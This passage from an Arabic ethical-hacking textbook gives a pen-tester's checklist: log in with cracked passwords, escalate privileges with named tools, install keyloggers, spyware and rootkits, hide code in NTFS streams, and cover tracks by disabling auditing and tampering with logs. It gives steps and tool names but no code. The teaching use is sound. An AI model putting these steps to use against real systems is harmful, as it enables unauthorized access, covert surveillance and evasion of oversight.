‫‪ -‬اﻟﺨﻄﻮة ‪ :1‬ﺣﺎول ﺗﺴﺠﯿﻞ اﻟﺪﺧﻮل ﺑﺎﺳﺘﺨﺪام أﺳﻤﺎء اﻟﻤﺴﺘﺨﺪﻣﯿﻦ اﻟﺘﻲ ﺗﻢ ﺗﻌﺪادھﺎ وﻛﻠﻤﺎت اﻟﻤﺮور اﻟﺘﻲ ﺗﻢ ﻛﺴﺮھﺎ‬
‫ﺑﻣﺟرد ﻛﺳر ﻛﻠﻣﺔ اﻟﺳر‪ ،‬ﺣﺎول ﺗﺳﺟﯾل اﻟدﺧول ﺑﺎﺳﺗﺧدام ﻛﻠﻣﺔ اﻟﻣرور اﻟﺗﻲ ﺗم اﻟﺣﺻول ﻋﻠﯾﮭﺎ ﻣن أﺟل اﻟوﺻول إﻟﻰ اﻟﻧظﺎم‪ .‬اﻟﺗﺣﻘﻖ ﻣﺎ إذا ﻛﺎن‬
‫ﯾﺗم ﺗﻘﯾﯾد اﻣﺗﯾﺎزات ﺗﺳﺟﯾل اﻟدﺧول‪ .‬إذا ﻛﺎن اﻟﺟواب ﺑﻧﻌم‪ ،‬ﻓﺣﺎول ﺗﺷﻐﯾل اﻟﺧدﻣﺎت واﻟﺣﺳﺎﺑﺎت اﻟﻣﺣروﻣﺔ ﻣن اﻻﻣﺗﯾﺎزات‪.‬‬
‫‪ -‬اﻟﺨﻄﻮة ‪ :2‬ﺣﺎول ﺗﺸﻐﯿﻞ اﻟﺨﺪﻣﺎت وﺣﺴﺎﺑﺎت اﻟﻤﺤﺮوﻣﯿﻦ )‪(unprivileged account‬‬
‫ﻗﺑل ﻣﺣﺎوﻟﺔ ﺗﺻﻌﯾد اﻻﻣﺗﯾﺎزات اﻟﺧﺎﺻﺔ ﺑك‪ ،‬ﺣﺎول ﺗﺷﻐﯾل اﻟﺧدﻣﺎت وﺗﺣﻘﻖ ﻣﺎ إذا ﻛﺎن ﻟدﯾك أذوﻧﺎت ﻟﺗﺷﻐﯾل اﻟﺧدﻣﺎت أم ﻻ‪ .‬إذا ﻛﻧت ﺗﺳﺗطﯾﻊ‬
‫ﺗﺷﻐﯾل اﻟﺧدﻣﺎت‪ ،‬ﺛم اﺳﺗﺧدام أدوات ﺗﺻﻌﯾد اﻣﺗﯾﺎز ﻟﻠﺣﺻول ﻋﻠﻰ اﻣﺗﯾﺎزات رﻓﯾﻌﺔ اﻟﻣﺳﺗوى‪.‬‬
‫‪ -‬اﻟﺨﻄﻮة ‪ :3‬اﺳﺘﺨﺪام أدوات ﺗﺼﻌﯿﺪ اﻻﻣﺘﯿﺎزات‬
‫اﺳﺗﺧدام أدوات ﺗﺻﻌﯾد اﻻﻣﺗﯾﺎز ﻣﺛل ‪،Offline NT Password Registry Editor ،Active@ Password Changer‬‬
‫‪،Elcomsoft System Recovery ،Windows Password Recovery Tool ،Windows Password Reset Kit‬‬
‫‪ ،Windows Password Recovery Bootdisk ،Trinity Rescue Kit‬اﻟﺦ‪ .‬ھذه اﻷدوات ﺳوف ﺗﺳﺎﻋدك ﻋﻠﻰ ﻛﺳب اﻣﺗﯾﺎزات‬
‫ذات ﻣﺳﺗوى أﻋﻠﻰ‪.‬‬

‫‪https://www.facebook.com/tibea2004‬‬ ‫د‪ .‬ﻣﺣﻣد ﺻﺑﺣﻲ طﯾﺑﮫ‬


‫‪487‬‬

‫‪Executing Application‬‬

‫ﻣﺧﺗﺑر اﻻﺧﺗراق ﯾﺟب ﻋﻠﯾﮫ ﻓﺣص أﻧظﻣﺔ اﻟﮭدف ﻋن طرﯾﻖ ﺗﻧﻔﯾذ ﺑﻌض اﻟﺗطﺑﯾﻘﺎت ﻣن أﺟل ﻣﻌرﻓﺔ اﻟﺛﻐرات اﻟﻣوﺟودة ﻓﻲ اﻟﻧظﺎم‪ .‬ﻓﯾﻣﺎ ﯾﻠﻲ‬
‫اﻟﺧطوات ﻟﻠﺗﺣﻘﻖ ﻣن اﻟﻧظﺎم اﻟﺧﺎص ﺑك ﻋﻧد اﺧﺗﯾﺎر ﺑﻌض اﻟﺗطﺑﯾﻘﺎت ﻟﯾﺗم ﺗﻧﻔﯾذھﺎ ﻟﺗﺣدﯾد اﻟﺛﻐرات‪.‬‬
‫‪ -‬اﻟﺨﻄﻮة ‪ :1‬اﻟﺘﺤﻘﻖ ﻣﻦ ﺗﺜﺒﯿﺖ ﻣﻜﺎﻓﺢ اﻟﻔﯿﺮوﺳﺎت ﻋﻠﻰ اﻟﻨﻈﺎم اﻟﮭﺪف‬
‫اﻟﺗﺣﻘﻖ ﻣﺎ إذا ﺗم ﺗﺛﺑﯾت ﺑراﻣﺞ ﻣﻛﺎﻓﺣﺔ اﻟﻔﯾروﺳﺎت ﻋﻠﻰ اﻟﻧظﺎم اﻟﮭدف وإذا ﻛﺎﻧت ﻣﺛﺑﺗﺔ‪ ،‬اﻟﺗﺣﻘﻖ ﻣن أﻧﮭﺎ ﻣﺣدﺛﮫ ﻟﺗﺎرﯾﺦ اﻟﯾوم أم ﻻ‪.‬‬
‫‪ -‬اﻟﺨﻄﻮة ‪ :2‬اﻟﺘﺤﻘﻖ ﻣﻦ ﺗﺜﺒﯿﺖ ﺟﺪار ﺣﻤﺎﯾﺔ واﻟﺒﺮاﻣﺞ اﻟﻤﻀﺎدة ‪Keylogging‬ﻋﻠﻰ اﻟﻨﻈﺎم اﻟﮭﺪف‬
‫اﻟﺗﺣﻘﻖ ﻣﺎ إذا ﺗم ﺗﺛﺑﯾت ﺑرﻧﺎﻣﺞ ﺟدار اﻟﺣﻣﺎﯾﺔ وﺑراﻣﺞ ﻣﻛﺎﻓﺣﺔ ال ‪ Keylogging‬أم ﻻ‪.‬‬
‫‪ -‬اﻟﺨﻄﻮة ‪ :3‬اﻟﺘﺤﻘﻖ ﻣﻦ ﻧﻈﺎم اﻷﺟﮭﺰة‬
‫ﻣﻌرﻓﺔ ﻣﺎ إذا ﻛﺎن ﯾﺗم ﺗﺄﻣﯾن اﻷﺟﮭزة ﻓﻲ ﺑﯾﺋﺔ ﻣؤﻣﻧﺔ‪.‬‬
‫‪ -‬اﻟﺨﻄﻮة ‪ :4‬اﺳﺘﺨﺪام ﻛﯿﻠﻮﺟﺮز‬
‫ﻣﺣﺎوﻟﺔ ﺗﺛﺑﯾت واﺳﺗﺧدام ﻛﯾﻠوﺟرز ﻋﻠﻰ اﻟﻧظﺎم ﻣن أﺟل ﺗﺳﺟﯾل ﺿرﺑﺎت اﻟﻣﻔﺎﺗﯾﺢ‪ .‬اﺳﺗﺧدام ﺗطﺑﯾﻘﺎت ﻛﯾﻠوﺟرز ﻣﺛل ‪،Spytech SpyAgent‬‬
‫‪ ،Advanced Keylogger ،Powered Keylogger ،All In One Keylogger‬اﻟﺦ‪.‬‬
‫‪ -‬اﻟﺨﻄﻮة ‪ :5‬اﺳﺘﺨﺪام ‪spyware‬‬
‫ﺣﺎول ﺗﺛﺑﯾت واﺳﺗﺧدام ﺑراﻣﺞ اﻟﺗﺟﺳس ﻋﻠﻰ اﻟﻧظﺎم ﻣن أﺟل رﺻد اﻷﻧﺷطﺔ ﻋﻠﻰ اﻟﻧظﺎم‪ .‬اﺳﺗﺧدام ﺑراﻣﺞ اﻟﺗﺟﺳس ﻣﺛل ‪SoftActivity TS‬‬
‫‪ ،SPYPhone GOLD ،Mobile Spy ،WebCam Recorder ،Spy Voice Recorder ،Monitor‬اﻟﺦ‪.‬‬
‫‪ -‬اﻟﺨﻄﻮة ‪ :6‬اﺳﺘﺨﺪام أدوات ﻟﻠﺘﻨﻔﯿﺬ ﻋﻦ ﺑﻌﺪ‬
‫ﻣﺣﺎوﻟﺔ ﺗﺛﺑﯾت واﺳﺗﺧدام أدوات ﻟﻠﺗﻧﻔﯾذ ﻋن ﺑﻌد‪.‬‬

‫‪Hiding Files‬‬

‫اﻟﻣﮭﺎﺟم ﯾﻘوم ﺑﺗﺛﺑت ‪ rootkits‬ﻟﻠﺣﻔﺎظ ﻋﻠﻰ اﻟوﺻول اﻟﺧﻔﻲ ﻟﻠﻧظﺎم‪ .‬ﯾﺟب ﻋﻠﯾك اﺗﺑﺎع ﺧطوات ﻣﺧﺗﺑر اﻻﺧﺗراق ﻟﻠﻛﺷف ﻋن اﻟﻣﻠﻔﺎت اﻟﻣﺧﻔﯾﺔ‬
‫ﻋﻠﻰ اﻟﻧظﺎم اﻟﮭدف‪.‬‬
‫‪ -‬اﻟﺨﻄﻮة ‪ :1‬ﺗﺜﺒﯿﺖ ‪rootkit‬‬
‫أوﻻ ﺣﺎول ﺗﺛﺑﯾت ‪ rootkit‬ﻓﻲ اﻟﻧظﺎم اﻟﻣﺳﺗﮭدف ﻟﻠﺣﻔﺎظ ﻋﻠﻰ اﻟوﺻول اﻟﺧﻔﻲ‪.‬‬
‫‪ -‬اﻟﺨﻄﻮة ‪ :2‬ﺗﻨﻔﯿﺬ ﺗﻘﻨﯿﺎت اﻟﻜﺸﻒ اﻟﻘﺎﺋﻢ ﻋﻠﻰ اﻟﺴﻼﻣﺔ )‪(Perform integrity-based Detection techniques‬‬
‫ﻗم ﺑﺗﻧﻔﯾذ اﻟﻛﺷوﻓﺎت اﻟﺗﺎﻟﯾﺔ‪،cross-view-based detection ،signature-based detection ،integrity-based detection :‬‬
‫‪ heuristic detection techniques‬ﻟﻠﻛﺷف ﻋن ‪.rootkit‬‬
‫‪ -‬اﻟﺨﻄﻮة ‪ :3‬اﺳﺘﺨﺪام ﺑﺮاﻣﺞ ﻣﻜﺎﻓﺤﺔ ‪rootkits‬‬
‫اﺳﺗﺧدام ‪ anti-rootkits‬ﻣﺛل ‪ ،Rootkit Buster ،Virus Removal Tool ،UnHackMe ،Stinger‬وﻣﺎ إﻟﻰ ذﻟك ﻟﻛﺷف ﻋن‬
‫‪.rootkits‬‬
‫‪ -‬اﻟﺨﻄﻮة ‪ :4‬اﺳﺘﺨﺪام )‪NTFS Alternate Data Streams (ADSs‬‬
‫اﺳﺗﺧدام )‪ NTFS Alternate Data Streams (ADSs‬ﻟﺣﻘن اﻟﺷﯾﻔرات اﻟﺧﺑﯾﺛﺔ ﻋﻠﻰ ﻧظﺎم اﻟﻣﺧﺗرق وﺗﻧﻔﯾذه دون أن ﯾﺗم اﻛﺗﺷﺎﻓﮭﺎ ﻣن‬
‫ﻗﺑل اﻟﻣﺳﺗﺧدم‪.‬‬
‫‪ -‬اﻟﺨﻄﻮة ‪ :5‬اﺳﺗﺧدام‪NTFS stream detectors‬‬
‫اﺳﺗﺧدام ‪ NTFS stream detectors‬ﻣﺛل ‪ ،Streams ،ADS spy ،StreamArmor‬وﻣﺎ إﻟﻰ ذﻟك ﻟﻛﺷف ﻋن ‪.NTFS-ADS streams‬‬
‫‪ -‬اﻟﺨﻄﻮة ‪ :6‬اﺳﺘﺨﺪام ﺗﻘﻨﯿﺔ إﺧﻔﺎء اﻟﻤﻌﻠﻮﻣﺎت‬
‫اﺳﺗﺧدام ﺗﻘﻧﯾﺎت إﺧﻔﺎء اﻟﻣﻌﻠوﻣﺎت ﻹﺧﻔﺎء اﻟرﺳﺎﺋل اﻟﺳرﯾﺔ داﺧل رﺳﺎﻟﺔ ﻋﺎدﯾﺔ واﺳﺗﺧراﺟﮭﺎ ﻓﻲ اﻟوﺟﮭﺔ ﻟﻠﺣﻔﺎظ ﻋﻠﻰ ﺳرﯾﺔ اﻟﺑﯾﺎﻧﺎت‪.‬‬
‫اﻟﺧطوة ‪ :7‬اﺳﺗﺧدام اﻟﻛﺷف ﻋن إﺧﻔﺎء اﻟﻣﻌﻠوﻣﺎت‬
‫اﺳﺗﺧدام أدوات اﻟﻛﺷف ﻋن إﺧﻔﺎء اﻟﻣﻌﻠوﻣﺎت ﻣﺛل ‪،Stego Suite ،Xstegsecret ،Gargoyle Investigator” Forensic Pro‬‬
‫‪ ،Stegdetect‬وﻣﺎ إﻟﻰ ذﻟك ﻷداء ‪.Steganalysis‬‬

‫‪https://www.facebook.com/tibea2004‬‬ ‫د‪ .‬ﻣﺣﻣد ﺻﺑﺣﻲ طﯾﺑﮫ‬


‫‪488‬‬

‫‪Covering Tracks‬‬

‫ﯾﺟب ﻋﻠﻰ ﻣﺧﺗﺑر اﻻﺧﺗراق ﺗﻐطﯾﺔ اﻟﻣﺳﺎرات وذﻟك ﻣن ﺧﻼل ﻣﺣﺎﻛﺎة ھﺟوم ﻹﺟراء اﺧﺗﺑﺎر اﻻﺧﺗراق‪ .‬ﻟﻠﺗﺣﻘﻖ ﻣﺎ إذا ﻛﺎن ﯾﻣﻛن ﺗﻐطﯾﺔ ﻣﺳﺎرات‬
‫اﻟﻧﺷﺎط اﻟﺧﺎص ﺑك‪ ،‬ﻧﺗﺑﻊ اﻟﺧطوات اﻟﺗﺎﻟﯾﺔ‪:‬‬
‫‪ -‬اﻟﺨﻄﻮة ‪ :1‬إزاﻟﺔ ﻣﺴﺎرات اﻟﻨﺸﺎط ﻋﻠﻰ ﺷﺒﻜﺔ اﻹﻧﺘﺮﻧﺖ‬
‫أوﻻ‪ ،‬إزاﻟﺔ ﻣﺳﺎرات اﻟﻧﺷﺎط ﻋﻠﻰ ﺷﺑﻛﺔ اﻹﻧﺗرﻧت ﻣﺛل ‪ ،MRU‬اﻟﻛوﻛﯾز‪ ،temporary files ،cache ،‬و‪.history‬‬
‫‪ -‬اﻟﺨﻄﻮة ‪ :2‬ﺗﻌﻄﯿﻞ اﻟﺘﺪﻗﯿﻖ )‪(audit‬‬
‫ﻓﻲ ﻣﺣﺎوﻟﺔ ﻟﺗﻌطﯾل اﻟﺗدﻗﯾﻖ ﻋﻠﻰ اﻟﻧظﺎم اﻟﺗﻲ ﺗﺳﺗﮭدﻓﮭﺎ‪ .‬ﯾﻣﻛﻧك اﻟﻘﯾﺎم ﺑذﻟك ﺑﺎﺳﺗﺧدام أدوات ﻣﺛل‪. Auditpol‬‬
‫‪ -‬اﻟﺨﻄﻮة ‪ :3‬اﻟﻌﺒﺚ ﻣﻊ ﻣﻠﻔﺎت اﻟﺴﺠﻞ‬
‫ﻣﺣﺎوﻟﺔ ﻟﻠﻌﺑث ﻣﻊ ﻣﻠﻔﺎت اﻟﺳﺟل ﻣﺛل ‪ proxy log files ،server log files ،event log files‬ﻣﻊ ‪ log poisoning‬او ‪.log flooding‬‬
‫‪ -‬اﻟﺨﻄﻮة ‪ :4‬اﺳﺘﺨﺪام أدوات ﺗﻐﻄﯿﺔ اﻟﻤﺴﺎرات‬
‫اﺳﺗﺧدام أدوات ﺗﻐطﯾﺔ اﻟﻣﺳﺎر ﻣﺛل‪ ،Clear My History ،Tracks Eraser Pro ،Wipe ،MRU-Blaster ، CCleaner‬اﻟﺦ‪.‬‬
‫‪ -‬اﻟﺨﻄﻮة ‪ :5‬ﺣﺎول ﻏﻠﻖ ﻛﺎﻓﺔ اﻻﺗﺼﺎﻻت ﻋﻦ ﺑﻌﺪ إﻟﻰ اﻟﺠﮭﺎز اﻟﻀﺤﯿﺔ‬
‫‪ -‬اﻟﺨﻄﻮات ‪ :6‬ﺣﺎول ﻏﻠﻖ أي ﻣﻦ اﻟﻤﻨﺎﻓﺬ اﻟﻤﻔﺘﻮﺣﺔ‬

‫ﺑﺣول ﷲ ﺗﻌﺎﻟﻰ ﻗد اﻧﺗﮭﯾﻧﺎ ﻣن اﻟوﺣدة اﻟﺧﺎﻣﺳﺔ‪ ،‬وﻻ ﺗﻧﺳوﻧﺎ ﺑﺻﺎﻟﺢ اﻟدﻋﺎء‪.‬‬

‫د‪ .‬ﻣﺣﻣد ﺻﺑﺣﻲ طﯾﺑﮫ‬

‫‪https://www.facebook.com/tibea2004‬‬ ‫د‪ .‬ﻣﺣﻣد ﺻﺑﺣﻲ طﯾﺑﮫ‬

You might also like